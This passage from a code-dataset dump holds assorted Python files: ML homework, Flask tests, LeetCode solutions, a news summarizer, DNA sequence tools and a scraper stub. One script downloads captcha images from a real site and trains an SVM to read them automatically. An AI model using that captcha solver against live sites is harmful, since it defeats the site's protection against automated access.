y_train)\nX_test_fs = fs.transform(X_test)\ndtc_y_pred = dtc.predict(X_test_fs)\nprint(dtc.score(X_test_fs, y_test))\nprint(classification_report(dtc_y_pred, y_test))\n","sub_path":"Tree_Titanic/Dtree_FS.py","file_name":"Dtree_FS.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"191826482","text":"# %%\n## 一些函数\n\n# 计算协方差矩阵的特征值和特征向量\ndef eig_pca(data, method='cov'):\n if method == 'corr':\n matrix = np.corrcoef(data.T)\n else:\n matrix = np.cov(data.T)\n lam, v = np.linalg.eig(matrix)\n sorted_indices = np.argsort(-lam)\n lam = lam[sorted_indices]\n v = v[:, sorted_indices]\n return lam, v\n\n# 拐点图\nimport matplotlib.pyplot as plt\ndef screeplot(subloc, variance, xlabels, title):\n plt.subplot(subloc)\n plt.plot(variance, marker='o', markerfacecolor='w')\n plt.title(title)\n plt.xticks(range(3), labels=xlabels)\n plt.ylabel('Variance')\n\n# 配对散点图\nimport seaborn as sns\ndef pairplot(data, diag_kind='kde', hue=None):\n sns.pairplot(data, diag_kind='kde', hue=hue)\n\n# %%\n## 7.1\n\n# 生成���据\nimport numpy as np\nnp.random.seed(42)\ndata = np.random.multivariate_normal(\n [0, 0, 0], [[1,1,1],[1,4,1],[1,1,100]], 100)\n\n# 分别计算特征值和特征向量\nlam1, v1 = eig_pca(data)\nlam2, v2 = eig_pca(data, 'corr')\nprint(lam1, '\\n\\n', v1, '\\n\\n', lam2, '\\n\\n', v2)\n\n# 计算 PC-scores\nimport pandas as pd\ndata_pca1 = pd.DataFrame(data.dot(v1), columns=['Comp1', 'Comp2', 'Comp3'])\ndata_pca2 = pd.DataFrame(data.dot(v2), columns=['Comp1', 'Comp2', 'Comp3'])\n\n# 绘制screeplot\nscreeplot(121, lam1, data_pca1.columns, \"cov_based\")\nscreeplot(122, lam2, data_pca1.columns, \"corr_based\")\n\n# 主成分的配对散点图\npairplot(data_pca1)\npairplot(data_pca2)\n\n\n# %%\n## 7.4\n\n# 读取数据\nfile_path = r\"C:\\Users\\Mac\\Desktop\\LDR\\pendigits.txt\"\ndigit = pd.read_table(file_path, header=0, sep=' ').values\nX = digit[:, :16]\n\n# 计算变量方差\nfeature_var = np.var(X, axis=0)\nprint(feature_var)\n\n# PCA\nlam, v = eig_pca(X)\n\n# 选取合适的主成分数目\nvar_cumratio = (lam / lam.sum()).cumsum()\nprint(\"取前\" + str(np.argmin(var_cumratio < 0.8) + 1) + \"个成分可以达到80%的方差贡献\")\nprint(\"取前\" + str(np.argmin(var_cumratio < 0.9) + 1) + \"个成分可以达到90%的方差贡献\")\n\n# 主成分的配对散点图\nX_pca = pd.DataFrame(X.dot(v), columns=['Comp'+str(i+1) for i in range(16)])\npairplot(X_pca.iloc[:, :3])\n\n# %%\n## 7.9\n\n# 读取数据(这个数据集有150个样本)\niris = sns.load_dataset(\"iris\")\nX = iris.drop(columns='species').values\n\n# PCA\nlam, v = eig_pca(X)\n\n# 计算 PC-scores\ndata = pd.DataFrame(X.dot(v), columns=['Comp'+str(i+1) for i in range(4)])\n\n# 主成分的配对散点图\ndata = pd.concat([data, iris['species']], axis=1)\npairplot(data, hue='species')\n\n\n","sub_path":"多元统计/code/homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"514041570","text":"from flask import json\nimport emailer\nimport parser\nimport unittest\n\n\nclass EmailerTestCase(unittest.TestCase):\n \"\"\" Tests the emailer functionality \"\"\"\n\n def setUp(self):\n emailer.app.config['TESTING'] = True\n self.app = emailer.app\n\n def test_email_mandrill(self):\n \"\"\" Tests an email send with Mandrill \"\"\"\n self.app.config['DEFAULT_MAIL_SERVICE'] = \"mandrill\"\n payload = {\n 'to': \"fake@example.com\",\n 'to_name': \"Ms. Fake\",\n 'from': \"noreply@uber.com\",\n 'from_name': \"Uber\",\n 'subject': \"A Message from Uber\",\n 'body': \"

Your Bill

$10

\"\n }\n with self.app.test_request_context('/email', method='POST'):\n with self.app.test_client() as c:\n response = c.post('/email', data=json.dumps(payload),\n content_type='application/json')\n response_data = json.loads(response.get_data())\n assert response_data['success'] is True\n\n def test_email_mailgun(self):\n \"\"\" Tests an email send with Mailgun \"\"\"\n self.app.config['DEFAULT_MAIL_SERVICE'] = \"mailgun\"\n payload = {\n 'to': \"fake@example.com\",\n 'to_name': \"Ms. Fake\",\n 'from': \"noreply@uber.com\",\n 'from_name': \"Uber\",\n 'subject': \"A Message from Uber\",\n 'body': \"

Your Bill

$10

\"\n }\n with self.app.test_request_context('/email', method='POST'):\n with self.app.test_client() as c:\n response = c.post('/email', data=json.dumps(payload),\n content_type='application/json')\n response_data = json.loads(response.get_data())\n assert response_data['success'] is True\n\n def test_email_missing_field(self):\n \"\"\" Tests an email send with a field missing \"\"\"\n payload = {\n 'to': \"fake@example.com\",\n 'to_name': \"\", # missing field\n 'from': \"noreply@uber.com\",\n 'from_name': \"Uber\",\n 'subject': \"A Message from Uber\",\n 'body': \"

Your Bill

$10

\"\n }\n with self.app.test_request_context('/email', method='POST'):\n with self.app.test_client() as c:\n response = c.post('/email', data=json.dumps(payload),\n content_type='application/json')\n response_data = json.loads(response.get_data())\n assert response_data['success'] is False\n assert \"field\" in response_data['result']\n\n def test_email_invalid_email(self):\n \"\"\" Tests an email send with an invalid email \"\"\"\n payload = {\n 'to': \"Ms. Fake\", # invalid email (to fields switched)\n 'to_name': \"fake@example.com\",\n 'from': \"noreply@uber.com\",\n 'from_name': \"Uber\",\n 'subject': \"A Message from Uber\",\n 'body': \"

Your Bill

$10

\"\n }\n with self.app.test_request_context('/email', method='POST'):\n with self.app.test_client() as c:\n response = c.post('/email', data=json.dumps(payload),\n content_type='application/json')\n response_data = json.loads(response.get_data())\n assert response_data['success'] is False\n assert \"email\" in response_data['result']\n\n\nclass ParserTestCase(unittest.TestCase):\n \"\"\" Tests html stripping and email validation \"\"\"\n\n def test_strip_simple(self):\n \"\"\" Tests simple html stripping \"\"\"\n text = \"

Your Bill

$10

\"\n cleaned_text = \"Your Bill $10\"\n assert parser.strip_html(text) == cleaned_text\n\n def test_strip_html_complex(self):\n \"\"\" Tests complex email stripping \"\"\"\n with open(\"testdata/test-strip-html.html\") as original:\n with open(\"testdata/test-strip-html-clean.txt\") as cleaned:\n dirty_text = original.read()\n cleaned_text = cleaned.read()\n assert cleaned_text == parser.strip_html(dirty_text)\n\n def test_validate_emails(self):\n \"\"\" Tests email validation \"\"\"\n email_tests = [(\"email\", False),\n (\"@email\", False),\n (\"_Steely.Morneau@uber.com\", True),\n (\".steely@uber.com\", False),\n (\"st..eely@uber.com\", False),\n (\"steely.@uber.com\", False),\n (\".@uber.com\", False),\n (\"Steely.Morneau5@uber.com\", True),\n (\"Steely Morneau@uber.com\", False)]\n\n for index, (email, is_valid) in enumerate(email_tests):\n assert parser.validate_email(email) == is_valid, (\n \"%s (%d); expected %s.\" % (email, index, is_valid))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"583084278","text":"import sys\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfilename = sys.argv[1]\ndf = pd.read_csv(filename, sep=',', engine='python')\nplt.figure(figsize=(16, 9))\nplt.title(filename.replace('\\\\', '/').split('/').pop())\nplt.ylabel('Temperature [°C]')\nplt.xlabel('Time [s]')\nplt.plot(df.iloc[:, 3], label='GPU')\nplt.plot(df.iloc[:, 13], label='CPU')\nplt.grid()\nplt.legend()\nplt.savefig('out.png')\n","sub_path":"temperaturePlot.py","file_name":"temperaturePlot.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"272630753","text":"\"\"\"\n1500. Design a File Sharing System\n\nWe will use a file-sharing system to share a very large file which consists of m small chunks with IDs from 1 to m.\n\nWhen users join the system, the system should assign a unique ID to them. The unique ID should be used once for each user, but when a user leaves the system, the ID can be reused again.\n\nUsers can request a certain chunk of the file, the system should return a list of IDs of all the users who own this chunk. If the user receive a non-empty list of IDs, they receive the requested chunk successfully.\n\n\nImplement the FileSharing class:\n\nFileSharing(int m) Initializes the object with a file of m chunks.\nint join(int[] ownedChunks): A new user joined the system owning some chunks of the file, the system should assign an id to the user which is the smallest positive integer not taken by any other user. Return the assigned id.\nvoid leave(int userID): The user with userID will leave the system, you cannot take file chunks from them anymore.\nint[] request(int userID, int chunkID): The user userID requested the file chunk with chunkID. Return a list of the IDs of all users that own this chunk sorted in ascending order.\n\n\nFollow-ups:\n\nWhat happens if the system identifies the user by their IP address instead of their unique ID and users disconnect and connect from the system with the same IP?\nIf the users in the system join and leave the system frequently without requesting any chunks, will your solution still be efficient?\nIf all each user join the system one time, request all files and then leave, will your solution still be efficient?\nIf the system will be used to share n files where the ith file consists of m[i], what are the changes you have to do?\n\n\nExample:\n\nInput:\n[\"FileSharing\",\"join\",\"join\",\"join\",\"request\",\"request\",\"leave\",\"request\",\"leave\",\"join\"]\n[[4],[[1,2]],[[2,3]],[[4]],[1,3],[2,2],[1],[2,1],[2],[[]]]\nOutput:\n[null,1,2,3,[2],[1,2],null,[],null,1]\nExplanation:\nFileSharing fileSharing = new FileSharing(4); // We use the system to share a file of 4 chunks.\n\nfileSharing.join([1, 2]); // A user who has chunks [1,2] joined the system, assign id = 1 to them and return 1.\n\nfileSharing.join([2, 3]); // A user who has chunks [2,3] joined the system, assign id = 2 to them and return 2.\n\nfileSharing.join([4]); // A user who has chunk [4] joined the system, assign id = 3 to them and return 3.\n\nfileSharing.request(1, 3); // The user with id = 1 requested the third file chunk, as only the user with id = 2 has the file, return [2] . Notice that user 1 now has chunks [1,2,3].\n\nfileSharing.request(2, 2); // The user with id = 2 requested the second file chunk, users with ids [1,2] have this chunk, thus we return [1,2].\n\nfileSharing.leave(1); // The user with id = 1 left the system, all the file chunks with them are no longer available for other users.\n\nfileSharing.request(2, 1); // The user with id = 2 requested the first file chunk, no one in the system has this chunk, we return empty list [].\n\nfileSharing.leave(2); // The user with id = 2 left the system.\n\nfileSharing.join([]); // A user who doesn't have any chunks joined the system, assign id = 1 to them and return 1. Notice that ids 1 and 2 are free and we can reuse them.\n\n\nConstraints:\n\n1 <= m <= 10^5\n0 <= ownedChunks.length <= min(100, m)\n1 <= ownedChunks[i] <= m\nValues of ownedChunks are unique.\n1 <= chunkID <= m\nuserID is guaranteed to be a user in the system if you assign the IDs correctly.\nAt most 10^4 calls will be made to join, leave and request.\nEach call to leave will have a matching call for join.\n\n\"\"\"\n\nfrom collections import defaultdict, deque\nfrom heapq import heapify, heappush, heappop\n\n\nclass FileSharing:\n\n def __init__(self, m: int):\n\n self.dict_ = {i: [] for i in range(1, m + 1)}\n self.user_db = {}\n self.count = 1\n self.queue = []\n\n def join(self, ownedChunks: List[int]) -> int:\n\n if (self.queue):\n user = self.queue.pop(0)\n\n else:\n user = self.count\n self.count += 1\n\n for i in ownedChunks:\n self.dict_[i].append(user)\n\n self.user_db[user] = ownedChunks\n return user\n\n def leave(self, userID: int) -> None:\n\n # print(userID,self.user_db.keys())\n\n for chunk in self.user_db[userID]:\n self.dict_[chunk].remove(userID)\n\n self.queue.append(userID)\n self.queue.sort()\n del self.user_db[userID]\n\n def request(self, userID: int, chunkID: int) -> List[int]:\n\n lst = self.dict_[chunkID].copy()\n lst.sort()\n\n if (lst != []):\n\n if not (userID in self.dict_[chunkID]):\n self.dict_[chunkID].append(userID)\n\n if not (chunkID in self.user_db[userID]):\n self.user_db[userID].append(chunkID)\n\n return lst\n\n\nclass FileSharing1:\n\n def __init__(self, m: int):\n\n self._chuckowen = [set() for _ in range(m + 1)]\n\n self._user = defaultdict(list)\n\n self._ids = set()\n\n self._idgenerator = [1]\n\n heapify(self._idgenerator)\n\n def _generateid(self) -> int:\n\n id = heappop(self._idgenerator)\n\n tmp = id + 1\n while tmp in self._ids and self._idgenerator and self._idgenerator[0] > tmp:\n tmp += 1\n\n if not self._idgenerator or self._idgenerator[0] > tmp:\n heappush(self._idgenerator, tmp)\n\n print(id, tmp)\n\n self._ids.add(id)\n\n return id\n\n def _removeid(self, id):\n\n self._ids.remove(id)\n\n heappush(self._idgenerator, id)\n\n def join(self, ownedChunks: list) -> int:\n\n id = self._generateid()\n\n self._user[id] = ownedChunks\n\n for c in ownedChunks:\n self._chuckowen[c].add(id)\n\n return id\n\n def leave(self, userID: int) -> None:\n\n print(userID)\n\n for c in self._user[userID]:\n self._chuckowen[c].remove(userID)\n\n del self._user[userID]\n\n self._removeid(userID)\n\n def request(self, userID: int, chunkID: int) -> list:\n\n tmp = sorted(list(self._chuckowen[chunkID]))\n\n if not tmp:\n return tmp\n\n self._chuckowen[chunkID].add(userID)\n self._user[userID].append(chunkID)\n\n return tmp\n\n # tmp = set(self._chuckowen[chunkID])\n\n # self._chuckowen[chunkID].add(userID)\n\n # self._user[userID].append(chunkID)\n\n # return sorted(list(tmp))\n\n\nif __name__ == '__main__':\n\n obj = FileSharing(14)\n\n res = obj.join([3,9,12,2,7,13,6,1,11,14])\n\n res = obj.leave(1)\n\n id1 = obj.join([2, 11])\n\n id2 = obj.join([14,10,3,2,13])\n\n id3 = obj.join([13])\n\n obj.leave(2)\n\n obj.leave(1)\n\n obj.leave(3)\n\n id = obj.join([14,12,1,2,9,5,8,4,6])\n\n obj.leave([1])","sub_path":"PythonLeetcode/leetcodeM/1500_DesignFileSharingSystem.py","file_name":"1500_DesignFileSharingSystem.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"35412211","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 03 12:52:03 2016\n\n@author: Daryl\n\"\"\"\n\nfrom __future__ import print_function\n\nimport pandas as pd\nfrom sklearn.ensemble import AdaBoostClassifier\nfrom sklearn.cross_validation import cross_val_score\n\ndef encode_target(df, target_column):\n df_mod = df.copy()\n targets = df_mod[target_column].unique()\n map_to_int = {name: n for n, name in enumerate(targets)}\n df_mod[\"Target\"] = df_mod[target_column].replace(map_to_int)\n return (df_mod, targets)\n \n \nif __name__ == \"__main__\":\n # Read modeled data to be used in classifier\n df = pd.read_csv(\"last6data.csv\", index_col=0)\n \n # Identify features for classifier\n features = ['HWDL', 'HGS', 'HGA', 'HRC', 'AWDL', 'AGS', 'AGA', 'ARC', \n 'H2hWDL', 'H2hGS', 'H2hGA', 'H2hRC']\n \n # Encode target column with integer values \n df, targets = encode_target(df, \"FTR\")\n y = df[\"Target\"]\n X = df[features]\n \n # Create Adaboost classifier and fit data\n dt = AdaBoostClassifier(algorithm='SAMME.R', base_estimator=None,\n learning_rate=0.5, n_estimators=50, random_state=None)\n dt.fit(X, y)\n \n # 10 fold cross validation for checking accuracy\n scores = cross_val_score(dt, X, y, cv=10)","sub_path":"Code/Final/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"12582943","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Sep 8 17:44:04 2021\r\n\r\n@author: Sreeram Aditya\r\n\"\"\"\r\n\r\nimport tkinter as tk\r\nimport nltk\r\nfrom textblob import TextBlob\r\nfrom newspaper import Article\r\nnltk.download('punkt')\r\ndef summarize():\r\n url=utext.get('1.0',\"end\").strip()\r\n article=Article(url)\r\n\r\n article.download()\r\n article.parse()\r\n\r\n article.nlp()\r\n title.config(state='normal')\r\n author.config(state='normal')\r\n publication.config(state='normal')\r\n summary.config(state='normal')\r\n sentiment.config(state='normal')\r\n \r\n title.delete('1.0',\"end\")\r\n title.insert('1.0',article.title)\r\n author.delete('1.0',\"end\")\r\n author.insert('1.0',article.authors)\r\n publication.delete('1.0',\"end\")\r\n publication.insert('1.0',article.publish_date)\r\n summary.delete('1.0',\"end\")\r\n summary.insert('1.0',article.summary)\r\n \r\n analysis=TextBlob(article.text)\r\n sentiment.delete('1.0','end')\r\n sentiment.insert('1.0',f'Polarity:{analysis.polarity},Sentiment:{\"positive\" if analysis.polarity >0 else \"negative\" if analysis.polarity <0 else \"neutral\"}')\r\n #dont know why error\r\n \r\n title.config(state='disabled')\r\n \r\n author.config(state='disabled')\r\n publication.config(state='disabled')\r\n summary.config(state='disabled')\r\n sentiment.config(state='disabled')\r\n\r\n\r\n\r\nroot=tk.Tk()\r\nroot.title('News Summarizer')\r\nroot.geometry('1200x600')\r\n\r\ntlabel=tk.Label(root,text=\"Title\")\r\ntlabel.pack()\r\ntitle=tk.Text(root,height=1,width=140)\r\ntitle.config(state='disabled',bg='#808080')\r\ntitle.pack()\r\n\r\nalabel=tk.Label(root,text=\"Author\")\r\nalabel.pack()\r\nauthor=tk.Text(root,height=1,width=140)\r\nauthor.config(state='disabled',bg='#808080')\r\nauthor.pack()\r\n\r\nplabel=tk.Label(root,text=\"Publication Date\")\r\nplabel.pack()\r\npublication=tk.Text(root,height=1,width=140)\r\npublication.config(state='disabled',bg='#808080')\r\npublication.pack()\r\n\r\nslabel=tk.Label(root,text=\"Summary\")\r\nslabel.pack()\r\nsummary=tk.Text(root,height=20,width=140)\r\nsummary.config(state='disabled',bg='#808080')\r\nsummary.pack()\r\n\r\nselabel=tk.Label(root,text=\"Sentiment Analysis\")\r\nselabel.pack()\r\nsentiment=tk.Text(root,height=1,width=140)\r\nsentiment.config(state='disabled',bg='#808080')\r\nsentiment.pack()\r\n\r\nulabel=tk.Label(root,text=\"URL\")\r\nulabel.pack()\r\nutext=tk.Text(root,height=1,width=140)\r\n\r\nutext.pack()\r\n\r\nbtn=tk.Button(root,text=\"Summarize\",command=summarize)\r\n\r\nbtn.pack()\r\n\r\nroot.mainloop()\r\n\r\n\r\n\r\n","sub_path":"news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"463731276","text":"def MergeSort(ar):\n if len(ar) > 1:\n mid = len(ar)//2\n L = ar[:mid]\n R = ar[mid:]\n \n MergeSort(L)\n MergeSort(R)\n\n i = j = k = 0\n #Pasando elementos a los arrays temporales\n while i < len(L) and j < len(R):\n if int(L[i][1]) <= int(R[j][1]) and int(L[i][2]) <= int(R[j][2]):\n ar[k] = L[i]\n i+=1\n else: \n ar[k] = R[j]\n j+=1\n k+=1\n #Comprobando si quedo algun elemento\n while i < len(L):\n ar[k] = L[i]\n i+=1\n k+=1\n while j < len(R):\n ar[k] = R[j]\n j+=1\n k+=1\n\nar = []\nn = int(input(\"Range: \"))\nfor i in range(n):\n mkv= input(\"Name Movie: \").split()\n ar.append(mkv)\nMergeSort(ar)\nfor i in ar:\n print(''.join(i[0]), end=\" \") \n\n\n#ENTRADA\n#5\n#StarWars 2 1\n#Alien 1 57\n#ASpaceOdyssey 2 41\n#Matrix 2 30\n#BladeRunner 1 57\n\n#SALIDA\n#Alien BladeRunner StarWars Matrix ASpaceOdyssey\n\n","sub_path":"ago-dic-2019/Jorge de Jesus Hernandez Vazquez/Practicas/Examenp1.py","file_name":"Examenp1.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"134405102","text":"#!/usr/bin/python\n\n#Develop a simple sequence processing script————\"wtools\", providing user interaction.\n#“input.fas” is operated to realize three simple sequence processing.:1.Calculate base number、2.Finding the reverse complementary sequence and 3.Search for the existence of a new small sequence.\nimport re#Import re module first\ndef calculatenum():\t\t#Define calculatenum function to calculate base number, and output the result to result1.txt.\n\tsum_a=0\t\t\t\t#Number of initializations 'A', same below.\n\tsum_t=0\n\tsum_c=0\n\tsum_g=0\n\twith open('result1.txt','w') as result1 :\t\t\t\t\t\t#Open output file————\"result1.txt\"\n\t\twith open(\"input.fas\", \"r\", encoding=\"utf-8\") as file1:\t\t#Open input file————\"input.fas\"\n\t\t\tfor line1 in file1:\n\t\t\t\tif(\">\" in line1):#Remove first row\n\t\t\t\t\tcontinue\n\t\t\t\tsum_a=line1.count(\"A\")+sum_a\t\t\t\t\t\t#Call the built-in function to count the number of each base.\n\t\t\t\tsum_t=line1.count(\"T\")+sum_t\n\t\t\t\tsum_c=line1.count(\"C\")+sum_c\n\t\t\t\tsum_g=line1.count(\"G\")+sum_g\n\t\t\tprint(\"The number of bases is:\",file=result1)\t\t\t#Print the number of each base to the output file\n\t\t\tprint(\"The number of A:\",sum_a,file=result1)\n\t\t\tprint(\"The number of T:\",sum_t,file=result1)\n\t\t\tprint(\"The number of C:\",sum_c,file=result1)\n\t\t\tprint(\"The number of G:\",sum_g,file=result1)\n\n#Finding the reverse complementary sequence\n#The following two functions are used to realize \"reverse complementarity of sequences\".\ndef complement(seq): \t\t\t\t#This function realizes base complementation.\n\tseq = seq.upper()\t\t\t\t#For the first time, replace with lowercase letters, indicating that the base has been replaced to prevent repeated replacement.\n\tseq = seq.replace(\"A\",\"t\")\t\t#Call the built-in function \"replace\" to change A to t\n\tseq = seq.replace(\"T\",\"a\")\t\t#Call the built-in function \"replace\" to change T to a\n\tseq = seq.replace(\"C\",\"g\")\t\t#Call the built-in function \"replace\" to change C to g\n\tseq = seq.replace(\"G\",\"c\")\t\t#Call the built-in function \"replace\" to change G to c\n\treturn seq.upper()\n#Finally, replace all the replaced bases with capital letters.\n\ndef RevAndCom(): \n\twith open('result2.txt','w') as result2 :\t\t\t\t\t\t#Open output file————\"result2.txt\"\n\t\tprint(\"The Reverse complementary sequence:\",file=result2)\t#Open input file————\"input.fas\"\n\t\twith open(\"input.fas\", \"r\", encoding=\"utf-8\") as file2:\n\t\t\tfor line2 in file2:\n\t\t\t\tif(\">\" in line2):\t\t\t#Remove first row\n\t\t\t\t\tcontinue\n\t\t\t\tnewline=complement(line2)[::-1]\t\t\t#Call the complement() function and reverse the string.\n\t\t\t\tprint(newline,file=result2)\n#Search for the existence of a new small sequence\ndef SearchSeq():\n\tprint(\"——\"*20)\n\tseq=input(\"Please input the sequence that you want to search:\")\n\twith open('result3.txt','w') as result3 :\t\t\t\t\t\t\t#Open output file————\"result3.txt\"\n\t\twith open(\"input.fas\", \"r\", encoding=\"utf-8\") as file3:\t\t\t#Open input file————\"input.fas\"\n\t\t\tline3=file3.readlines()\n\t\t\tline3=str(line3)#Make sure the matching object is a string.\n\t\t\ttmp=re.finditer(seq,line3)\n\t\t\tcount_match=0#Define a count variable to calculate the number of matches\n\t\t\tprint(\"The search results are as follows:\")\n\t\t\tfor i in tmp:\n\t\t\t\tcount_match=count_match+1 #Each iteration, the number of \"count_match\" is increased by one.\n\t\t\t\tprint(i,file=result3)\n\t\t\tprint(\"The total number of matches is:\",count_match,file=result3)#Summary\n\n\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t","sub_path":"wtools/wtools.py","file_name":"wtools.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"511541497","text":"# -*- coding: utf-8 -*-\nimport uuid\n\nimport os\nimport requests\nfrom PIL import Image\nfrom svmutil import *\n\nfrom utils.utils import huidu_JZ, _9_gg_JZ, remove_border, image_crop, print_image\n\nmapper = {\n \"101.0\": \"A\",\n \"102.0\": \"B\",\n \"103.0\": \"C\",\n \"104.0\": \"D\",\n \"105.0\": \"E\",\n \"106.0\": \"F\",\n \"107.0\": \"G\",\n \"108.0\": \"H\",\n \"109.0\": \"I\",\n \"1010.0\": \"J\",\n \"1011.0\": \"K\",\n \"1012.0\": \"L\",\n \"1013.0\": \"M\",\n \"1014.0\": \"N\",\n \"1015.0\": \"O\",\n \"1016.0\": \"P\",\n \"1017.0\": \"Q\",\n \"1018.0\": \"R\",\n \"1019.0\": \"S\",\n \"1020.0\": \"T\",\n \"1021.0\": \"U\",\n \"1022.0\": \"V\",\n \"1023.0\": \"W\",\n \"1024.0\": \"X\",\n \"1025.0\": \"Y\",\n \"1026.0\": \"Z\",\n \"0.0\": \"0\",\n \"1.0\": \"1\",\n \"2.0\": \"2\",\n \"3.0\": \"3\",\n \"4.0\": \"4\",\n \"5.0\": \"5\",\n \"6.0\": \"6\",\n \"7.0\": \"7\",\n \"8.0\": \"8\",\n \"9.0\": \"9\",\n}\n\n\ndef load_new_image():\n \"\"\"\n 下载新的图片\n :return:\n \"\"\"\n for i in range(500):\n # 下载新图片\n response = requests.get(\n url=\"http://bm.e21cn.com/func/checkcode.ashx\"\n )\n file_path = \"../image/test.png\"\n with open(file_path, \"wb\") as img_file:\n img_file.write(response.content)\n\n # 灰度降噪\n image = Image.open(file_path)\n image = huidu_JZ(image, 200)\n\n # 9宫格降噪\n image = _9_gg_JZ(image, 1)\n # print_image(image)\n\n # 去边框\n image = remove_border(image)\n # print_image(image)\n\n # 字符提取\n image_list = image_crop(image, 6)\n for child_image in image_list:\n child_image.save(\"../image/biao_zhu/{name}.jpeg\".format(name=uuid.uuid4()))\n print(\"=====>> {0}\".format(i))\n\n\nif __name__ == \"__main__\":\n \"\"\"仅仅是为了测试识别效果\"\"\"\n # just fot test\n if os.path.exists(\"test.png\"):\n os.remove(\"test.png\")\n if os.path.exists(\"test_file\"):\n os.remove(\"test_file\")\n\n # 下载新图片\n response = requests.get(\n url=\"http://bm.e21cn.com/func/checkcode.ashx\"\n )\n file_path = \"test.png\"\n with open(file_path, \"wb\") as img_file:\n img_file.write(response.content)\n\n # 灰度降噪、图片2值化\n image = Image.open(file_path)\n image = huidu_JZ(image, 200)\n # print_image(image)\n\n # 9宫格降噪\n image = _9_gg_JZ(image, 1)\n # print_image(image)\n\n # 去边框\n image = remove_border(image)\n # print_image(image)\n\n # 字符提取\n image_list = image_crop(image, 6)\n\n with open(\"test_file\", \"a\") as test_file:\n for i in range(len(image_list)):\n child_image = image_list[i]\n\n image = Image.open(file_path)\n width = child_image.width\n height = child_image.height\n\n svm_result = str(i) + \" \"\n # 记录y\n for y in range(11): # 此处11是图片最大宽高\n count = 0\n if y >= height:\n svm_result += \"{0}:{1} \".format(y + 1, count)\n continue\n for x in range(11):\n if x >= width:\n continue\n pixel = child_image.getpixel((x, y))\n if pixel == 0:\n count += 1\n svm_result += \"{0}:{1} \".format(y + 1, count)\n\n # 记录x\n for x in range(11):\n count = 0\n if x >= width:\n svm_result += \"{0}:{1} \".format(x + 12, count)\n continue\n for y in range(11):\n if y >= height:\n continue\n pixel = child_image.getpixel((x, y))\n if pixel == 0:\n count += 1\n svm_result += \"{0}:{1} \".format(x + 12, count)\n\n test_file.write(svm_result.strip() + \"\\n\")\n # 开始识别\n yt, xt = svm_read_problem(\"test_file\")\n model = svm_load_model(\"model\")\n p_label, p_acc, p_val = svm_predict(yt, xt, model)\n for result in p_label:\n print(mapper[str(result)], end=\"\")\n","sub_path":"decoder/low_01.py","file_name":"low_01.py","file_ext":"py","file_size_in_byte":4108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"179709209","text":"#\n# @lc app=leetcode id=25 lang=python\n#\n# [25] Reverse Nodes in k-Group\n#\n# https://leetcode.com/problems/reverse-nodes-in-k-group/description/\n#\n# algorithms\n# Hard (38.20%)\n# Likes: 1443\n# Dislikes: 290\n# Total Accepted: 211.3K\n# Total Submissions: 553.1K\n# Testcase Example: '[1,2,3,4,5]\\n2'\n#\n# Given a linked list, reverse the nodes of a linked list k at a time and\n# return its modified list.\n#\n# k is a positive integer and is less than or equal to the length of the linked\n# list. If the number of nodes is not a multiple of k then left-out nodes in\n# the end should remain as it is.\n#\n#\n#\n#\n# Example:\n#\n# Given this linked list: 1->2->3->4->5\n#\n# For k = 2, you should return: 2->1->4->3->5\n#\n# For k = 3, you should return: 3->2->1->4->5\n#\n# Note:\n#\n#\n# Only constant extra memory is allowed.\n# You may not alter the values in the list's nodes, only nodes itself may be\n# changed.\n#\n#\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\nclass Solution(object):\n def reverseKGroup(self, head, k):\n \"\"\"\n :type head: ListNode\n :type k: int\n :rtype: ListNode\n \"\"\"\n if self.get_length(head) < k:\n return head\n\n pre = None\n curr = head\n count = k\n while curr and count > 0:\n next = curr.next\n curr.next = pre\n pre = curr\n curr = next\n count -= 1\n\n # pre is the new head\n # head is the new tail\n # curr is the next list\n head.next = self.reverseKGroup(curr, k)\n return pre\n\n def get_length(self, head):\n count = 0\n p = head\n while p:\n count += 1\n p = p.next\n return count\n\n\n# @lc code=end\n\n","sub_path":"Python/25.reverse-nodes-in-k-group.py","file_name":"25.reverse-nodes-in-k-group.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"76165411","text":"from bs4 import BeautifulSoup\r\nimport urllib.request\r\nimport os\r\n\r\n\r\n# Създаваме списък, който ще държи всички страници (за всяка една буква, с която започва името на изпълнителя):\r\n# Първият елемент е за тези, чийто псевдоним започва с число\r\nall_lyrics_index = ['https://www.eurobeat-prime.com/lyrics.php?artist=1']\r\n\r\n\r\n# Допълваме листа с буквите от A до Z\r\nfor letter in range(ord('a'), ord('z') + 1):\r\n 